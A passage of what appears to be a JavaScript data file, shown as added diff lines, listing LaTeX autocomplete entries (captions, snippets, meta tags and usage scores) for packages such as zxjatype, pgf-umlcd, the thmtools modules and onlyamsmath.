caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'zxjatype-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'zxjatype-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'zxjatype-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'zxjatype-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'zxjatype-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'zxjatype-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'zxjatype-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'zxjatype-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'zxjatype-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'zxjatype-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'zxjatype-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'zxjatype-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'zxjatype-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + 
snippet: '\\preto{$1}{$2}', + meta: 'zxjatype-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'zxjatype-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zxjatype-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'zxjatype-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'zxjatype-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'zxjatype-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'zxjatype-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zxjatype-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'zxjatype-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'zxjatype-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'zxjatype-cmd', + score: 0.2864294797053033, + }, + ], + newclude: [ + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'newclude-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'newclude-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\include{}', + snippet: '\\include{$1}', + meta: 'newclude-cmd', + score: 0.1547080054979312, + }, + ], + 'pgf-umlcd': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-umlcd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgf-umlcd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgf-umlcd-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgf-umlcd-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgf-umlcd-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgf-umlcd-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-umlcd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.004719094298848707, + }, + { + caption: 
'\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgf-umlcd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgf-umlcd-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgf-umlcd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgf-umlcd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgf-umlcd-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgf-umlcd-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgf-umlcd-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-umlcd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgf-umlcd-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.2864294797053033, + }, + ], + 'thm-listof': [ + { + caption: '\\listtheoremname', + snippet: '\\listtheoremname', + meta: 'thm-listof-cmd', + score: 1.9443373798666845e-5, + }, + { + caption: '\\thmtformatoptarg', + snippet: '\\thmtformatoptarg', + meta: 'thm-listof-cmd', + score: 6.353668036093916e-5, + }, + { + caption: '\\listoftheorems[]', + snippet: '\\listoftheorems[$1]', + meta: 'thm-listof-cmd', + score: 1.9443373798666845e-5, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'thm-listof-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'thm-listof-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'thm-listof-cmd', + score: 
0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'thm-listof-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\proof{}', + snippet: '\\proof{$1}', + meta: 'thm-listof-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\proof', + snippet: '\\proof', + meta: 'thm-listof-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'thm-listof-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'thm-listof-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'thm-listof-cmd', + score: 0.215689795055434, + }, + { + caption: '\\endproof', + snippet: '\\endproof', + meta: 'thm-listof-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\endproof{}', + snippet: '\\endproof{$1}', + meta: 'thm-listof-cmd', + score: 0.0006133100544751855, + }, + ], + 'thm-autoref': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'thm-autoref-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\proof{}', + snippet: '\\proof{$1}', + meta: 'thm-autoref-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\proof', + snippet: '\\proof', + meta: 'thm-autoref-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'thm-autoref-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'thm-autoref-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'thm-autoref-cmd', + score: 0.215689795055434, + }, + { + caption: '\\endproof', + snippet: '\\endproof', + meta: 'thm-autoref-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\endproof{}', + snippet: '\\endproof{$1}', + meta: 'thm-autoref-cmd', + score: 0.0006133100544751855, + }, + ], + 'thm-patch': [ + { + caption: '\\proof{}', + snippet: '\\proof{$1}', + meta: 'thm-patch-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\proof', + snippet: '\\proof', + meta: 'thm-patch-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'thm-patch-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'thm-patch-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'thm-patch-cmd', + score: 0.215689795055434, + }, + { + caption: '\\endproof', + snippet: '\\endproof', + meta: 'thm-patch-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\endproof{}', + snippet: '\\endproof{$1}', + meta: 'thm-patch-cmd', + score: 0.0006133100544751855, + }, + ], + 'thm-kv': [ + { + caption: '\\declaretheoremstyle[]{}', + snippet: '\\declaretheoremstyle[$1]{$2}', + meta: 'thm-kv-cmd', + score: 0.0001168034231635369, + }, + { + caption: '\\declaretheorem[]{}', + snippet: '\\declaretheorem[$1]{$2}', + meta: 'thm-kv-cmd', + score: 0.0004904790216915127, + }, + { + caption: '\\theoremstyle{}', + snippet: '\\theoremstyle{$1}', + meta: 'thm-kv-cmd', + score: 0.02533412165007986, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'thm-kv-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\proof{}', + snippet: '\\proof{$1}', + meta: 'thm-kv-cmd', + score: 
0.000701497773639073, + }, + { + caption: '\\proof', + snippet: '\\proof', + meta: 'thm-kv-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'thm-kv-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'thm-kv-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'thm-kv-cmd', + score: 0.215689795055434, + }, + { + caption: '\\endproof', + snippet: '\\endproof', + meta: 'thm-kv-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\endproof{}', + snippet: '\\endproof{$1}', + meta: 'thm-kv-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'thm-kv-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'thm-kv-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'thm-kv-cmd', + score: 0.008565354665444157, + }, + ], + onlyamsmath: [ + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'onlyamsmath-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'onlyamsmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'onlyamsmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'onlyamsmath-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'onlyamsmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'onlyamsmath-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'onlyamsmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'onlyamsmath-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'onlyamsmath-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'onlyamsmath-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'onlyamsmath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'onlyamsmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'onlyamsmath-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'onlyamsmath-cmd', + score: 
0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'onlyamsmath-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'onlyamsmath-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'onlyamsmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'onlyamsmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'onlyamsmath-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'onlyamsmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'onlyamsmath-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'onlyamsmath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'onlyamsmath-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'onlyamsmath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'onlyamsmath-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'onlyamsmath-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'onlyamsmath-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'onlyamsmath-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'onlyamsmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'onlyamsmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'onlyamsmath-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'onlyamsmath-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'onlyamsmath-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'onlyamsmath-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'onlyamsmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'onlyamsmath-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'onlyamsmath-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'onlyamsmath-cmd', + 
score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'onlyamsmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'onlyamsmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'onlyamsmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'onlyamsmath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'onlyamsmath-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'onlyamsmath-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'onlyamsmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'onlyamsmath-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'onlyamsmath-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'onlyamsmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'onlyamsmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'onlyamsmath-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'onlyamsmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'onlyamsmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'onlyamsmath-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'onlyamsmath-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'onlyamsmath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'onlyamsmath-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'onlyamsmath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'onlyamsmath-cmd', + score: 
6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'onlyamsmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'onlyamsmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'onlyamsmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'onlyamsmath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'onlyamsmath-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'onlyamsmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'onlyamsmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'onlyamsmath-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'onlyamsmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'onlyamsmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'onlyamsmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'onlyamsmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'onlyamsmath-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'onlyamsmath-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'onlyamsmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'onlyamsmath-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'onlyamsmath-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'onlyamsmath-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'onlyamsmath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'onlyamsmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'onlyamsmath-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'onlyamsmath-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'onlyamsmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'onlyamsmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'onlyamsmath-cmd', + score: 
